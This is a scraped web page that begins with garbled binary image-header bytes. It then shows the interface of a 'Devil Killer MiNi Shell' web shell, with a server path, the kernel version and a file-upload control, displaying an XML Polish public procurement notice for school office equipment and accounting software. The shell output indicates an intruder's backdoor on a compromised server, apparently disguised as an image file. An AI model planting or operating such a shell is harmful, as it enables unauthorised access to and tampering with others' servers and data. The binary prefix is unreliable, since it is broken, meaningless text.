JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17269_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17269</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Powiat Brzeziński</nazwa><ulica>ul. Sienkiewicza</ulica><nr_domu>16</nr_domu><nr_miesz></nr_miesz><miejscowosc>Brzeziny</miejscowosc><kod_poczt>95060 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>łódzkie</wojewodztwo><tel>046 8741111, 8743164</tel><fax>468 741 111</fax><email>promocja@powiat-brzeziny.wici.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url></adres_strony_url><podmiot2c></podmiot2c><regon>75073171100000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>"Akademia Mistrzów Zawodu – program wsparcia dla uczniów kształcących się w Powiecie Brzezińskim”</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia>www.powiat-brzeziny.4bip.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja /><zamieszczona_bedzie_specyfikacja>www.powiat-brzeziny.4bip.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>pisemnie</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Starostwo Powiatowe w Brzezinach ul. Sienkiewicza 16 95-060 Brzeziny</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Zakup oprogramowania oraz sprzętu biurowo- dydaktycznego.</nazwa_zamowienia><numer_referencyjny></numer_referencyjny><czy_dialog_techniczny /><rodz_zam>D</rodz_zam><przedmiot_zam>Część I –  sprzęt biurowo-dydaktyczny


1. 	Router 	-1  szt.
Wymagania minimalne:

Porty:  4 porty LAN 10/100/1000Mb/s
             1 port WAN 10/100/1000Mb/s
             2 porty USB 2.0
Zasilanie: 12VDC / 2.5A
Standardy bezprzewodowe: IEEE 802.11ac/n/a 5GHz
                                                 IEEE 802.11b/g/n 2.4GHz
Częstotliwość pracy: 2.4GHz oraz 5GHz;
Prędkość transmisji: 5GHz: do 867Mb/s
                                     2.4GHz: do 300Mb/s;
Funkcje transmisji bezprzewodowej: Włączanie/wyłączanie transmisji bezprzewodowej, most
                                                                WDS, WMM, statystyki transmisji bezprzewodowej;
Bezpieczeństwo transmisji bezprzewodowej: 64/128bitowe szyfrowanie WEP / WPA / WPA2,
                                                                             WPA-PSK / WPA2-PSK;
Typ połączenia WAN: Dynamiczne IP/Statyczne IP/PPPoE/PPTP(Dual Access)/ L2TP(Dual
                                       Access)/BigPond;
DHCP: Serwer/klient DHCP, lista klientów DHCP, rezerwacja adresów;

Kontrola dostępu: Kontrola rodzicielska, lokalna kontrola dostępu do panelu zarządzania, lista
                                 hostów, harmonogram dostępu, zarządzanie regułami;
Zabezpieczenia zapory sieciowej: Ochrona przed atakami DoS, zapora sieciowa SPI, filtrowanie
                                                          domen, adresów IP i MAC, wiązanie adresów IP i MAC;
Protokoły: Obsługa IPv4 oraz IPv6;
Zarządzanie: kontrola dostępu, zarządzanie lokalne, zarządzanie zdalne;
Funkcja Guest Network: 1 sieć 2.4GHz, 1 sieć 5GHz;  
Wymagania systemowe: Microsoft Windows 98SE, NT, 2000, XP, Vista™, Windows 7, lub Windows 8, MAC OS, NetWare, UNIX lub Linux;


2.	Urządzenie wielofunkcyjne -2 szt.
Wymagania minimalne:

Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Komunikacja:  wireless - druk przez WiFi
Format obsługiwanych dokumentów: A4
Technika druku: laser kolor
Miesięczne obciążenie: do 30000 stron 
Szybkość drukowania w kolorze: do 18 stron A4/min 
Rozdzielczość druku w kolorze: 2400x600 dpi 
Przeznaczenie do druku: mono/kolor - tekst i grafika 
Standardowa pojemność podajników: do 250 arkuszy
Obsługiwane formaty nośników: 
A4 
A5 
A6 
Letter 
Legal 
Executive 
Folio 
3. 	Projektor -2 szt.
Wymagania minimalne:

Rozdzielczość rzeczywista 800 x 480 (WVGA)
Liczba wyświetlanych kolorów min.16,7 mln
Rzeczywisty współczynnik proporcji obrazu 16:9, 4:3
Korekcja zniekształceń trapezowych (Keystone) ± 15 (w pionie)
Źródło światła lampa bezrtęciowa (ledowa)
Żywotność lampy (tryb normalny) 20000
Jasność (tryb normalny) 800
Kontrast (tryb normalny) 800:1
Odległość projekcji 1-3,8
Wielkość obrazu 34-130
Głośniki Tak
Ilość wbudowanych głośników 2
Moc głośnika 2
Złącza (wejścia) 1 x HDMI, 1 x USB, 1 x stereo mini-jack, 1 x wejście AV mini jack
Pilot w zestawie Tak
Wyposażenie dodatkowe:
Sposób mocowania: podsufitowy (opcja obracania wyświetlanego obrazu)
Dodatkowe wyposażenie: uchwyt podsufitowy, kabel HDMI 4m, kabel audio 2 x jack 4 m.

4. 	Ekran projekcyjny -2 szt.
Wymagania minimalne:
Sposób mocowania: ścienne/sufitowe 
Rozmiar ekranu: 180x180 cm (1:1) 
Sposób rozwijania: pilot bezprzewodowy 
5.	Urządzenie wielofunkcyjne -4 szt.
Wymagania minimalne:
Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Komunikacja: kabel USB
Funkcje urządzenia: drukowanie, skanowanie, kopiowanie
Technika druku: laser kolor
Miesięczne obciążenie: do 10000 stron 
Szybkość drukowania w kolorze: do 10 stron A4/min 
Rozdzielczość druku w kolorze: 2400x600 dpi 
Przeznaczenie do druku: mono/kolor - tekst i grafika 
Standardowa pojemność podajników: do 150 arkuszy
Obsługiwane formaty nośników: 
A4 
A5 
A6 
Letter 
6.	Laserowy czytnik  kodów kreskowych -4 szt.
Wymagania minimalne:
Źródło światła laser
Technologia odczytu pojedyncza linia
Głębokość odczytu 10 000 mm
Rozdzielczość 0.127 mm
Prędkość odczytu 100
Długość przewodu 150 cm
Akcesoria w zestawie kabel USB , podstawka

7.	Drukarka kodów kreskowych i etykiet logistycznych -4 szt.
Wymagania minimalne:

Technika wydruku:  Termotansferowa /Termiczna
Rozdzielczość:  min. 200 dpi
Szybkość wydruku:  min. 150 mm/s
Maksymalna szerokość etykiet: 108 mm
Maksymalna długość etykiet:  2286 mm
Pamięć: 4MB Flash, 8MB SDRAM + slot kart MicroSD
Złącze komunikacyjne: USB, RS i Centronics,  moduł Wi-Fi (opcjonalnie)
Oprogramowanie: sterowniki Windows, BarTender (wersja TSC)
Inne wyposażenie: gilotyna.

8.	Frankownica -1 szt.
Wymagania minimalne:
Rozmiar obsługiwanych kopert: wszystkie rodzaje (powyżej 6 mm – etykiety)
Automatyczne ustawianie aktualnej daty: TAK
Licznik sumarycznej wartości ofrankowanej korespondencji: TAK
Pamięć: do 6 różnych klisz reklamowych.
Liczba użytkowników korzystających z urządzenia: do 5
Opcja drukowania zestawień ilościowych i kosztowych: TAK
Opcje przesyłek: POLCONY, PRIORYTET
Możliwość druku rejestrów urządzenia: TAK
Materiały wymienne: etykiety/paski do frankownic (pojedyncze 1000 szt., podwójne 1000 szt.)

9. 	Telefon stacjonarny z faksem -1 szt.
Wymagania minimalne:
Prędkość wydruku: 14 PPM
Maksymalna prędkość modemu: 14 400 bps (dobierana automatycznie)
Pamięć dokumentów: Ok. 100 stron w trybie odbioru dokumentów do pamięci i ok. 100 stron w trybie nadawania dokumentów
Identyfikacja Abonenta Wywołującego z prezentacją nazwy i numeru: TAK
Komunikaty na wyświetlaczu LCD i wydruki raportów w języku polskim: TAK
Komunikaty na wyświetlaczu LCD i wydruki raportów w innym języku (angielskim): OPCJONALNIE
Przycisk nawigacyjny ułatwiający dostęp do funkcji telefaksu oraz książki telefonicznej: TAK
Ilość miejsca w książce telefonicznej: do 100 wpisów
Wybieranie jednoprzyciskowe: do 20 wpisów
Rozsyłanie sekwencyjne: do 20 abonentów
Transmisja opóźniona: TAK
Elektroniczna regulacja głośności głośnika i dzwonka: TAK
Opisy na obudowie w języku polskim: TAK
Opisy na obudowie w innym języku obcym (angielskim): OPCJONALNIE
Materiały wymienne: 5 rolek papieru do faksu
10. 	Bindownica -1 szt.
Wymagania minimalne:
Format: A4 
Ilość dziurkowanych kartek: do 15
Ilość oprawianych kartek: do 500
Regulacja marginesu: TAK
Ogranicznik formatu: TAK
Miarka maksymalnej ilości dziurkowanych kartek: TAK
Wskaźnik do pomiaru grubości grzbietu: TAK
Wskaźnik ułatwiający dobór odpowiedniej średnicy grzbietu i szerokości marginesu 
Materiał obudowy i podstawy: metal 
Materiały wymienne: 
grzbiety do bindowania plastikowy – 8mm 100 szt., 16 mm 100 szt., 38 mm 100 szt (kolor dowolny)
okładki wierzchnie przezroczyste do bindowania – 300 szt. (kolor biały)
okładki spodnie do bindowania skóropodobne do bindowania – 300 szt. (kolor granatowy)

11.	Niszczarka dokumentów-1 szt.
Wymagania minimalne:
Ilość niszczonych kartek: do 5
Pojemność kosza: 7 – 7,5  litra
Typ niszczarki: ścinkowa
Rozmiar cięcia: min. 4 x 40
Niszczony materiał: papier
Inne materiały, które można niszczyć: NIE

12.	Tablica suchościeralna -2 szt.
Wymagania minimalne:
 Rozmiar: 70x100 cm
Typ montażu: stojak/trójnóg regulowany do wys. min. 180 cm
Rama: aluminiowa
Możliwość zawieszenia bloków flipchart: OPCJONALNIE
Półka na flamastry i gąbkę: TAK
Materiały wymienne: flamastry (min, 3 kolory) i gąbka.

13.	Tablica typu flipchart -2 szt.
Wymagania minimalne:
Rozmiar: 70x100 cm
Typ montażu: stojak wyposażonym w blokowane kółka
Półka na flamastry i gąbkę: TAK
Materiały wymienne: flamastry (min. 3 kolory), 5 szt. Bloków do flipchart (50 kartek gładkich/szt.)


Przedmiot zamówienia ( część I) obejmuje serwis dostarczonego sprzętu biurowo-dydaktycznego  ( przegląd co najmniej raz w roku)  w siedzibie szkoły przez okres 2 lat od dnia sporządzenia protokołu odbioru.


4.2 Część II –  oprogramowanie na nośniku:


1. 	System sprzedaży z obsługą magazynów	-na 32 stanowiska komputerowe
Wymagania minimalne:
•	pełna obsługa wszystkich typów dokumentów handlowych i magazynowych;
•	prowadzenie kartoteki kontrahentów, obejmującej również informacje typu CRM; możliwość definiowania rubryk z dodatkowymi informacjami;
•	prowadzenie kartoteki towarów, usług, kompletów i opakowań zwrotnych z rozbudowaną kalkulacją cen (10 poziomów cen sprzedaży, w tym ceny walutowe);
•	pełny rozdział dokumentów magazynowych i handlowych, pojedyncze lub zbiorcze generowanie faktur do dokumentów WZ itp.; automatyczne generowanie dokumentu WZ do faktury;
•	obsługa przedpłat, płatności kartą kredytową oraz sprzedaży kredytowanej;
•	obsługa zamówień z rezerwacją towarów oraz fakturami zaliczkowymi;
•	rozbudowana obsługa rachunków bankowych (złotówkowych lub walutowych) z operacjami wpłaty, wypłaty i transferu (plus opłaty prowizyjne, wyciągi, itp.);
•	pełna obsługa rozrachunków (należności i zobowiązań), w tym rozrachunków wielowalutowych;
•	wiele różnorodnych zestawień, raportów i analiz; możliwość tworzenia własnych raportów;
•	rozbudowana obsługa urządzeń zewnętrznych (kasy fiskalne, drukarki fiskalne, wagi etykietujące, czytniki kodów paskowych);
•	pełna integracja z systemem zarządzania relacjami z klientami (CRM);
•	pełna integracja z komputerową księgą przychodów i rozchodów oraz systemem finansowo-księgowym.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.


2.	 Generator Kodów Kreskowych	-na 16 stanowisk
komputerowych
Wymagania minimalne:

•	generowanie wszystkich standardowych kodów kreskowych, ze standardem ISBN włącznie. 
•	generowanie pojedynczych kodów kreskowych w formie gotowej do wydruku w programach graficznych i DTP. 
•	możliwość zapisywania kodu w różnych formatach graficznych, np.: BMP, GIF, JPEG (JPG), TIFF, PNG, PCL, EPS.
•	Obsługiwanie min. takich kodów jak ANSI/AIM Code 93, Code 128A, DUN-14, EAN-8, EAN-1 

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.

3. 	Pakiet oprogramowania podstawowego (system Windows 10, pakiet Office, wybrany program antywirusowy)-32 szt.
Wymagania minimalne:
Program antywirusowy:
•	Ochrona komputera w czasie rzeczywistym, pozwalająca na bieżąco chronić komputer przed infekcjami, mechanizm skanowania plików i dysków na żądanie, którego pracę i obszary działania można w dużym stopniu konfigurować i moduł antyspaware. 
•	kwarantanna, w której umieszczane są zainfekowane pliki, 
•	harmonogram zadań, pozwalający automatyzować proces skanowania komputera
•	listy ignorowanych lokalizacji, pomijanych podczas skanowania. 
•	moduł antyspamowy, 
•	zapora sieciowa, 
•	ochrona przed atakami phishing, 
•	funkcja skanowania zewnętrznych pamięci podłączonych do komputera 
Do użytku szkolnego.
Aktualizacje i serwis techniczny do 2023 r.

4. 	Księga przychodów i rozchodów oraz system naliczania podatku zryczałtowanego-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	prowadzenie księgi przychodów i rozchodów lub ewidencji podatku zryczałtowanego (w zależności od wybranej formy księgowości);
•	prowadzenie ewidencji VAT: zakupów, sprzedaży w tym ewidencjonowanie transakcji unijnych; możliwość wprowadzania sprzedaży nieudokumentowanej rozliczanej strukturą zakupów;
•	prowadzenie ewidencji danych pojazdów wykorzystywanych do celów służbowych, rachunków związanych z eksploatacją pojazdów oraz ewidencji przebiegu pojazdów;
•	prowadzenie ewidencji środków trwałych oraz wartości niematerialnych i prawnych (naliczanie i księgowanie amortyzacji, wydruk planu amortyzacji), a także prowadzenie ewidencji wyposażenia i remanentów;
•	prowadzenie kartoteki kontrahentów oraz wspólników (indywidualne parametry dotyczące rozliczeń z ZUS, automatyczne księgowanie w koszty lub odliczanie od dochodu składek ZUS i innych funduszy, obliczanie i dokumentowanie odpowiednim raportem zaliczki na podatek dochodowy);
•	rozbudowana obsługa wynagrodzeń: ewidencja osobowa, umów cywilnoprawnych oraz umów o pracę; wystawianie rachunków do umów cywilnoprawnych oraz wypłat (w tym możliwość automatycznego wyliczania na podstawie zdefiniowanych schematów wynagrodzeń);
•	naliczanie, wydruk oraz pełna obsługa wysyłki elektronicznej deklaracji skarbowych (wraz z niezbędnymi załącznikami): VAT-7, VAT-7K, VAT-7D,VAT-UE, PIT-11, PIT-36, PIT-36L, PIT-37, PIT-40, PIT-4R, PIT-28, PIT-8AR;
•	Obsługa korekt deklaracji skarbowych z wysyłką elektroniczną;
•	wystawianie deklaracji ZUS (DRA, RCA, RZA) oraz możliwość eksportu do programu Płatnik ZUS.

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
5.	System finansowo-księgowy ułatwiający prowadzenie pełnej księgowości	- na 16 stanowisk
komputerowych
Wymagania minimalne:
•	elastyczne zarządzanie planami kont: możliwość generowania wzorcowego planu kont, przeniesienia z innego roku obrotowego, automatycznie tworzenie kont kartotekowych przez podłączanie kartotek, obsługa kont pozabilansowych;
•	rozbudowana dekretacja: podział dokumentów księgowych na dekrety i dokumenty zaksięgowane, automatyzacja wykonywanych czynności (tworzenie i rozliczanie rozrachunków, generowanie zapisów VAT), obsługa dekretów walutowych;
•	zaawansowane zarządzanie rozrachunkami (tworzenie i rozliczanie); ścisłe powiązanie rozrachunków z zapisami na kontach; pełna historia rozrachunków; 
•	ewidencja i rozliczanie podatku VAT w pełni zgodne z aktualnie obowiązującą ustawą: ewidencjonowanie transakcji VAT krajowych (dostawy i nabycia), wewnątrzwspólnotowych (WNT i WDT) oraz pozaunijnych (eksport towarów, import towarów); automatyczne wyliczanie deklaracji VAT-7/7K - rozliczanie miesięczne lub kwartalne;
•	automatyczne tworzenie dekretów księgowych za pomocą dekretacji kontekstowej i importu; rozbudowane schematy importu; 
•	moduł Dokumenty do dekretacji;
•	funkcje specjalnie przygotowane dla biur rachunkowych: obsługa dowolnej liczby podmiotów gospodarczych, przenoszenie planów kont z innych podmiotów, zbiorcze operacje na licencjach, import dokumentów z pliku wygenerowanego, archiwizacja wszystkich podmiotów jednocześnie i inne;
•	ewidencja środków trwałych i wartości niematerialnych i prawnych oraz operacji z nimi związanych;
•	definiowanie i wyliczanie szeregu sprawozdań i zestawień finansowych oraz deklaracji skarbowych;
•	tworzenie wydruków graficznych (wszystkie) i tekstowych (główne); zaawansowane zarządzanie wydrukami graficznymi z poziomu programu;
•	praca w sieci komputerowej lub na pojedynczym stanowisku.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
6.	System kadrowo-płacowy	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	ewidencja umów o pracę z bardzo elastycznym mechanizmem tworzenia zaawansowanych systemów wynagrodzeń (wiele definicji wypłat w jednej umowie, globalne lub indywidualne składniki płacowe); 
•	planowanie czasu pracy pracownika w umowach o pracę (zmiany kalendarza pracy w czasie trwania umowy, określanie wyjątków), wydruki kalendarzy miesięcznych i rocznych; 
•	 ewidencja umów zleceń, o dzieło oraz kontraktów menedżerskich (m.in. kwotowe koszty uzyskania przychodów); definiowanie elastycznych harmonogramów wypłacania rachunków dla umów cywilnoprawnych; 
•	rejestracja faktycznego czasu pracy pracownika (nadgodziny, godziny nocne, godziny absencji, rozliczanie miesięczne lub okresowe, np. co 3 miesiące);
•	ewidencja nieobecności w pracy (absencje chorobowe, urlopowe i wiele innych) dla umów o pracę i umów cywilnoprawnych (wybrane absencje); 
•	 rozbudowane składniki płacowe (naliczenia, potrącenia, składniki parametryczne, składniki definiowalne, składniki automatyczne, duże możliwości parametryzacji); 
•	 definicje list płac i zestawów płacowych, ułatwiające i automatyzujące naliczanie comiesięcznych wynagrodzeń; rozliczanie ewidencji czasu pracy, akordów, prowizji, naliczeń, potrąceń i potrąceń komorniczych w dowolnej liście płac; rozbudowany analizator wypłat; 
•	naliczanie i drukowanie deklaracji skarbowych (PIT-4, PIT-4R,PIT-8AR, PIT-11/8B, PIT-36, PIT-36L, PIT-37, PIT-40); generowanie danych do deklaracji zgłoszeniowych i rozliczeniowych ZUS.

Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
7.	System zarządzania relacjami z klientami	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	szybki dostęp do wszystkich informacji dotyczących klientów: działań, wiadomości, szans sprzedaży;
•	planowanie i rejestrowanie w systemie działań takich jak: spotkania, zadania, telefony, listy, faksy i rozmowy internetowe;
•	łatwe wyszukiwanie klienta z dowolnego miejsca w programie;
•	kalendarz pokazujący zakres i termin czynności do wykonania (w widoku miesięcznym, tygodniowym i dziennym) wraz z funkcją przypominania;
•	wbudowany moduł poczty elektronicznej - automatyczne przypisywanie e-maili do odpowiednich klientów, możliwość tworzenia wiadomości zbiorczych (mailing) na podstawie zdefiniowanych szablonów oraz pól autotekstu;
•	dostęp do pełnej historii kontaktów z klientem (działania, wiadomości e-mail, wystawione dokumenty, wiarygodność płatnicza, data ostatniego kontaktu, nazwisko opiekuna klienta, wysokość udzielonych rabatów itd.);
•	możliwość przydzielania zadań oraz sprawdzania postępu prac poszczególnych pracowników;
•	liczne zestawienia (m.in. lejek sprzedaży, prognozowanie sprzedaży, skuteczność sprzedawców, aktywność użytkowników itp.), także generowane zestawień na podstawie danych typu: sprzedaż wg asortymentu, raport o towarach;
•	możliwość dostosowania do własnych potrzeb (m.in. dodawanie własnych zestawień, dostosowanie wydruków, edytowalne słowniki, pola własne, pasek szybkiego dodawania obiektów);
•	powiązania - możliwość tworzenia relacji między obiektami, takimi jak klienci, szanse sprzedaży, działania i wiadomości;
•	biblioteka dokumentów;
•	schowek, w którym można przechowywać różne obiekty (np. zadania, wiadomości, klientów, szanse sprzedaży) do późniejszego wykorzystania;
•	obsługa walut (w tym pobieranie kursów walut przez Internet);
•	wygodny system notatek;
•	strona główna zawierająca listę zadań dla użytkownika oraz prognozę wartości sprzedaży liczoną na podstawie otwartych szans sprzedaży;
•	możliwość otwierania modułów w wielu zakładkach;
•	praca sieciowa wielu użytkowników programu.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
8.	System wspomagania decyzji, analizujący dane 	-na 16 stanowisk
komputerowych
Wymagania minimalne:

•	prezentowanie zestawień  w arkuszu kalkulacyjnym Microsoft Excel w postaci interaktywnych wielowymiarowych tabel i wykresów. 
•	sortowanie tabel,
•	filtrowanie danych,
•	dokonywanie podsumowań na dowolnym poziomie,
•	korzystanie z całego zestawu różnorodnych funkcji statystycznych (m.in. średnia, minimum, maksimum, odchylenie standardowe),
•	przechodzenie od danych zagregowanych do danych szczegółowych i odwrotnie,
•	korzystanie z predefiniowanych formatów tabel,
•	zmiana typu wykresu (słupkowe, kołowe, punktowe, 2-D, 3-D).
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
9. 	Internetowe biuro rachunkowe	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	Zarządzanie bazą klientów on-line.
•	Zarządzanie fakturami i historią rozliczeń klientów.
•	Import faktur z innych programów magazynowo-sprzedażowych 
•	Dopasowanie skanów z archiwum z zaimportowanymi danymi z pliku na podstawie danych OCR.
•	Możliwość przesyłania dokumentów e-mailem.
•	Baza dokumentów – skanowanie, OCR i automatyczne rozpoznawanie pól, wyszukiwanie, eksport dokumentów.
•	 Wymiana dokumentami. Konfiguracja uprawnień według typu dokumentu. Komentowanie dokumentów.
•	Zarządzanie kadrami klientów, możliwość przesyłania gotowych list płac, RMUA i innych dokumentów kadrowych.
•	Rozliczenia klienta – swobodny wgląd w wyniki finansowe klienta (zarówno przez biuro, jak i samego klienta).
•	Powiadomienia klienta o ważnych terminach przez e-mail i SMS.
•	Zarządzanie kartotekami kontrahentów.
•	Istnienie opcji wystawiania faktur.
•	Zarządzanie fakturami.
•	Baza dokumentów – wymiana dokumentami. Konfiguracja uprawnień wg. typu dokumentu.
